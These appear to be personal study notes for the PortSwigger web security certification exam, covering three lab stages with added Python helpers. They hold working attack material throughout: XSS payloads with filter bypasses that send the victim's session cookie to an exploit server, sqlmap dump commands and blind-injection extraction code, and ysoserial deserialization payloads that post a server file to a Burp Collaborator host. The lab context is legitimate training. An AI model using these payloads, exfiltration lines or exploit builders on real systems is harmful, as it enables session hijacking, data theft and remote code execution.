For details of the exam and labs, go to https://portswigger.net/web-security/certification/how-it-works
EXAM PREP 1/3: XSS
1. DOM XSS in lookup function
- to find it, send the lookup request to Intruder/Scanner; Burp Scanner flags it as DOM-based XSS (it may also come up as plain reflected XSS). The vulnerable JS is 'resources/js/searchResults.js'.
- the Chrome "Untrusted Types" extension shows the reflected value reaching the eval sink in the DevTools console.
- it shows the statement being eval'd, so you can see what to inject to keep the statement valid and pop an alert:
var searchResultsObj = {"results":[],"searchTerm":""-alert(1)-""}
- possible payloads in the search function (refer to Lab: Reflected DOM XSS; the backslash variant is for when the server escapes the quote, as in that lab):
\\"-alert(1)}//
OR
"-alert(1)-"
- notes: https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting
- highly recommended: install https://github.com/filedescriptor/untrusted-types for Chrome; it hooks dangerous sinks such as eval and shows what reaches them.
- "-alert(document.cookie)-" is blocked by the server (check the response in the DevTools Network tab), so a filter bypass is needed.
- to bypass the document.cookie filter, reach the same property through the window global with bracket notation:
\\"-alert(window["document"]["cookie"])}//
OR
"-alert(window["document"]["cookie"])-"
*see https://www.secjuice.com/bypass-xss-filters-using-javascript-global-variables/ for more on this trick*
*use the "Untrusted Types" Chrome extension to confirm the bypass syntax actually reaches the sink*
- to send the victim's cookie to the exploit server, assign window["document"]["location"] with the cookie in the query string; to get the exploit-server hostname past the filter, write its dots as %2e (the browser percent-decodes the host when it navigates):
\\"-(window["document"]["location"]="https://exploit-ac271f041e05294980199d1901ad0098%2eweb-security-academy%2enet/?"+window["document"]["cookie"])}//
OR
"-(window["document"]["location"]="https://exploit-ace61f411f22344280191eb3016d00ea%2eweb-security-academy%2enet//?"+window["document"]["cookie"])-"
- host this script on the exploit server (adapted from "Lab: Reflected XSS into HTML context with all tags blocked except custom ones"). The payload in the lab URL must be fully URL-encoded, which is why the % of %2e appears as %25 below:
<script>
location='https://ac2d1f471e24291580959d6900e30065.web-security-academy.net/?lookup=%5C%5C%22-%28window%5B%22document%22%5D%5B%22location%22%5D%3D%22https%3A%2F%2Fexploit-ac271f041e05294980199d1901ad0098%252eweb-security-academy%252enet%2F%3F%22%2Bwindow%5B%22document%22%5D%5B%22cookie%22%5D%29%7D%2F%2F';
</script>
OR
!! NOTE: the parameter name changes between lab instances (search_term vs lookup, and likewise the other names), so check the actual request before building the URL !!
<script>
location='https://ac701f751f8f348b80171ec10036004a.web-security-academy.net/?search_term=%22-%28window%5B%22document%22%5D%5B%22location%22%5D%3D%22https%3A%2F%2Fexploit-ace61f411f22344280191eb3016d00ea%252eweb-security-academy%252enet%2F%2F%3F%22%2Bwindow%5B%22document%22%5D%5B%22cookie%22%5D%29-%22';
</script>
- use the captured session cookie to log in as carlos. 1/3 done; now the admin panel.
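Added example (my own code, not from the notes or from PortSwigger) that assembles the exploit-server page above from its parts, so the two encoding layers (%2e in the hostname, then full URL-encoding of the whole payload for the lab URL) can be checked instead of hand-assembled. It reuses the lab and exploit-server hostnames from the notes; the helper names are mine.

```python
from urllib.parse import quote, unquote


def exfil_payload(exploit_host, prefix, suffix):
    """Build the JS that sends the victim to the exploit server with document.cookie
    in the query string, using the two filter-evasion tricks from the notes."""
    # 1. bracket notation via the window global instead of the literal 'document.cookie'
    # 2. dots in the attacker host written as %2e; the browser percent-decodes the
    #    host part of a URL when it navigates, so the host still resolves
    host = exploit_host.replace(".", "%2e")
    js = f'(window["document"]["location"]="https://{host}/?"+window["document"]["cookie"])'
    # prefix/suffix close the JSON string and object literal handed to eval(),
    # e.g. '\\"-' ... '}//' or '"-' ... '-"' as in the notes
    return prefix + js + suffix


def exploit_url(lab_host, param, payload):
    """Place the payload in the vulnerable query parameter, fully URL-encoded.
    safe='' encodes everything except unreserved characters, so the '%' of %2e
    becomes %25 and survives the server's one round of query-string decoding."""
    return f"https://{lab_host}/?{param}={quote(payload, safe='')}"


def exploit_page(lab_host, param, payload):
    """The HTML body to host on the exploit server (same shape as the notes' script)."""
    return "<script>\nlocation='" + exploit_url(lab_host, param, payload) + "';\n</script>"


def decoded_param(url):
    """What the lab server sees after URL-decoding the parameter: a sanity check that
    the JS is intact and the hostname still carries %2e rather than a literal dot."""
    return unquote(url.split("=", 1)[1])


if __name__ == "__main__":
    # hostnames copied from the notes; the parameter name varies per instance
    payload = exfil_payload("exploit-ac271f041e05294980199d1901ad0098.web-security-academy.net",
                            '\\\\"-', "}//")
    url = exploit_url("ac2d1f471e24291580959d6900e30065.web-security-academy.net", "lookup", payload)
    print(exploit_page("ac2d1f471e24291580959d6900e30065.web-security-academy.net", "lookup", payload))
    print(decoded_param(url))
```

Swap the prefix/suffix pair for '"-' and '-"' to get the second variant from the notes; everything else stays the same.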
EXAM PREP 2/3 SQLi
2. use burp scanner to scan for SQLi.
- the injection point is the 'SortBy=DATE' param. Confirm with a trailing single quote, then mark the point with * and hand the request to sqlmap:
https://ac2d1f471e24291580959d6900e30065.web-security-academy.net/filtered-search?lookup=test&SortBy=DATE'&blogger=
- use sqlmap to extract, passing the session cookies from the logged-in browser:
sqlmap -u "https://ac2d1f471e24291580959d6900e30065.web-security-academy.net/filtered-search?lookup=test&SortBy=DATE*&blogger=" --cookie="_lab=46%7cMCwCFG2IfeQ5CHUndYpTAPtmGpE8MZRHAhROekAjQ2%2bFoBDYXnQhjEaI0TGBCTenrDuN8SmGoEzablVpLkdA07iiBE72yehRPHxSL5BW4bAUUq1m6Apg%2fO6jwIIPOjCU4qfFuoNCIz9S%2f7Nk12%2fOvm4C7BmOU4QbEYLOdPrZgIGUCe0%3d; session=DtX3UfneU9ZTeTlU20TY7lUzRj7DEhCL" --dump
- sqlmap output (PostgreSQL). Parameter names differ per instance; this one used SearchTerm/organizeBy/blogartist:
Parameter: #1* (URI)
Type: boolean-based blind
Title: PostgreSQL boolean-based blind - Parameter replace
Payload: https://ac701f751f8f348b80171ec10036004a.web-security-academy.net:443/filtered_search?SearchTerm=test&organizeBy=(SELECT (CASE WHEN (9975=9975) THEN 9975 ELSE 1/(SELECT 0) END))&blogartist=
Type: error-based
Title: PostgreSQL error-based - Parameter replace
Payload: https://ac701f751f8f348b80171ec10036004a.web-security-academy.net:443/filtered_search?SearchTerm=test&organizeBy=(CAST((CHR(113)||CHR(98)||CHR(106)||CHR(118)||CHR(113))||(SELECT (CASE WHEN (4363=4363) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(106)||CHR(106)||CHR(113)) AS NUMERIC))&blogartist=
Type: stacked queries
Title: PostgreSQL > 8.1 stacked queries (comment)
Payload: https://ac701f751f8f348b80171ec10036004a.web-security-academy.net:443/filtered_search?SearchTerm=test&organizeBy=DATE;SELECT PG_SLEEP(5)--&blogartist=
Type: time-based blind
Title: PostgreSQL > 8.1 time-based blind - Parameter replace
Payload: https://ac701f751f8f348b80171ec10036004a.web-security-academy.net:443/filtered_search?SearchTerm=test&organizeBy=(SELECT 5932 FROM PG_SLEEP(5))&blogartist=
- use the following manual SQLi to get the admin passwd:
????????
- extract the administrator password, log in with it, and delete user carlos from the admin panel.
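Added example, my own code and not from the notes; it is not the missing manual query above, which is left as it is. It shows, against an in-memory SQLite stand-in with assumed table and column names, how boolean-based blind extraction works in an ORDER BY position such as SortBy, i.e. the technique behind sqlmap's CASE WHEN payload. SQLite returns NULL instead of an error for 1/(SELECT 0), so the example reads the true/false signal from the resulting sort order rather than from an error; on the real target each oracle call is one HTTP request with the expression in the sort parameter.

```python
import sqlite3
import string


def make_db():
    """Constructed stand-in for the lab database (table/column names are assumptions)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE posts(id INTEGER, title TEXT, date TEXT);
        INSERT INTO posts VALUES (1, 'Zebra post', '2020-03-01'),
                                 (2, 'Apple post', '2020-01-01'),
                                 (3, 'Mango post', '2020-02-01');
        CREATE TABLE users(username TEXT, password TEXT);
        INSERT INTO users VALUES ('administrator', 's3cr3t'), ('carlos', 'hunter2');
    """)
    return conn


def filtered_search(conn, sort_by):
    """The bug: the sort parameter (SortBy=DATE in the notes) is concatenated into
    ORDER BY, where it cannot be bound as a parameter and is not validated."""
    return [row[0] for row in conn.execute(f"SELECT title FROM posts ORDER BY {sort_by}")]


def oracle(conn, condition):
    """Boolean oracle in ORDER BY: sort by id when the condition is true, by title
    when it is false, and read the answer from which post comes first."""
    payload = f"(CASE WHEN ({condition}) THEN id ELSE title END)"
    return filtered_search(conn, payload)[0] == "Zebra post"


def extract(conn, subquery, charset=string.ascii_lowercase + string.digits, max_len=64):
    """Character-by-character extraction of a scalar subquery's result (LENGTH and
    SUBSTR exist in both SQLite and PostgreSQL)."""
    length = next((n for n in range(1, max_len + 1)
                   if oracle(conn, f"LENGTH(({subquery})) = {n}")), 0)
    out = ""
    for pos in range(1, length + 1):
        for ch in charset:
            if oracle(conn, f"SUBSTR(({subquery}), {pos}, 1) = '{ch}'"):
                out += ch
                break
        else:
            out += "?"  # nothing in the charset matched: widen it rather than fail silently
    return out


if __name__ == "__main__":
    db = make_db()
    print(extract(db, "SELECT password FROM users WHERE username = 'administrator'"))
```

A binary search over the character's code point (ASCII() / UNICODE() comparisons) cuts the request count from roughly 36 per character to about 7; the linear scan is kept here because it is easier to follow in Burp's HTTP history.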
EXAM PREP 3/3 SERIALIZED
3. insecure deserialization in the admin-prefs cookie. Burp Scanner detects it.
- the cookie is a gzip-compressed Java serialized object, base64-encoded. The Burp 'Java Deserialization Scanner' extension can probe for gadget chains; here it reported:
Apache Commons Collections 3 Alternate payload 2 (Sleep): Potentially VULNERABLE!!!
Commons BeanUtils (Sleep): Potentially VULNERABLE!!!
Apache Commons Collections 3 Alternate payload 3 (Sleep): Potentially VULNERABLE!!!
!! ALL FALSE POSITIVES (sleep-based detection); verify each gadget yourself and check the Burp Scanner output !!
- do this on Kali; you need ysoserial.jar. If a recent JDK refuses with module-access errors, run java with the --add-opens flags listed in the ysoserial README, or use Java 8.
- refer to Lab: Exploiting Java deserialization with Apache Commons
Eg (generates the object and base64-encodes it; the admin-prefs cookie additionally needs the gzip step, see the full pipeline below):
java -jar ysoserial-master-d367e379d9-1.jar CommonsCollections5 'cat /home/carlos/secret' | base64
- backticks, pipes and redirects do not work here: the ysoserial gadget runs the command through Runtime.exec(), which splits on whitespace and never starts a shell, so 'host `cat /home/carlos/secret`.xxxxx.burpcollaborator.net' is sent literally and nothing is substituted. Use a single program that reads the file itself, e.g. wget --post-file (below).
- Commons Collections 5
java -jar ysoserial-master-d367e379d9-1.jar CommonsCollections5 'wget --post-file /home/carlos/secret 57atjr760eg9rmvtk7hwu2ho4fa68ux.burpcollaborator.net' | gzip -f | base64 -w0
- https://notsosecure.com/oob-exploitation-cheatsheet/
- the secret arrives out-of-band in the body of the wget POST and shows up in the Burp Collaborator HTTP interaction. Paste the resulting base64 into the admin-prefs cookie (URL-encode it if the original cookie value was URL-encoded).
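Added example, my own code and not from the notes or from ysoserial: it decodes an admin-prefs cookie to check whether the server really is deserializing a Java object (the stream header 0xACED0005 is the real Java serialization magic), re-wraps a ysoserial payload the way the notes' gzip | base64 pipeline does, and rejects commands that rely on a shell, which is the failure behind the backtick note above. Treating the cookie as URL-encoded is an assumption; the sample cookie contents are constructed.

```python
import base64
import gzip
import subprocess
from urllib.parse import quote, unquote

JAVA_MAGIC = b"\xac\xed\x00\x05"      # STREAM_MAGIC 0xACED, STREAM_VERSION 5
SHELL_METACHARS = set("`$|;&<>()")


def decode_cookie(value):
    """URL-decode and base64-decode the cookie, gunzipping it if it is gzipped."""
    raw = base64.b64decode(unquote(value))
    try:
        return gzip.decompress(raw)
    except (OSError, EOFError):  # not gzip (BadGzipFile is an OSError subclass) or truncated
        return raw


def is_java_serialized(value):
    """True when the decoded cookie starts with the Java serialization magic, i.e. the
    server hands this blob to ObjectInputStream and a gadget chain is worth trying."""
    return decode_cookie(value).startswith(JAVA_MAGIC)


def encode_cookie(serialized, url_safe=True):
    """Wrap a serialized object the way the server expects: gzip, then base64, then
    (assumed) URL-encode, since the base64 alphabet contains + / =."""
    b64 = base64.b64encode(gzip.compress(serialized)).decode()
    return quote(b64, safe="") if url_safe else b64


def check_exec_command(command):
    """ysoserial gadgets run the command via Runtime.exec(), which splits on whitespace
    and never starts a shell: backticks, $(...), pipes and redirects are passed literally
    and do nothing. Reject them early instead of wondering why Collaborator stays silent."""
    bad = SHELL_METACHARS & set(command)
    if bad:
        raise ValueError(f"shell metacharacters {sorted(bad)} are not interpreted by Runtime.exec")
    return command


def ysoserial_cookie(jar, gadget, command):
    """Equivalent of the notes' pipeline (needs java and the jar on disk):
    java -jar ysoserial.jar CommonsCollections5 '<command>' | gzip -f | base64 -w0"""
    check_exec_command(command)
    result = subprocess.run(["java", "-jar", jar, gadget, command],
                            check=True, capture_output=True)
    return encode_cookie(result.stdout)


if __name__ == "__main__":
    # constructed stand-in for ysoserial output: the magic header plus arbitrary bytes
    fake_object = JAVA_MAGIC + b"constructed serialized object body"
    cookie = encode_cookie(fake_object)
    print(cookie)
    print(is_java_serialized(cookie))
    print(check_exec_command("wget --post-file /home/carlos/secret xxxxx.burpcollaborator.net"))
```

Run is_java_serialized on the cookie the application issued before spending time on gadget chains; a cookie that decodes to JSON or a plain string is not a deserialization sink, whatever the scanner's sleep probes claim.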
3/3 completed
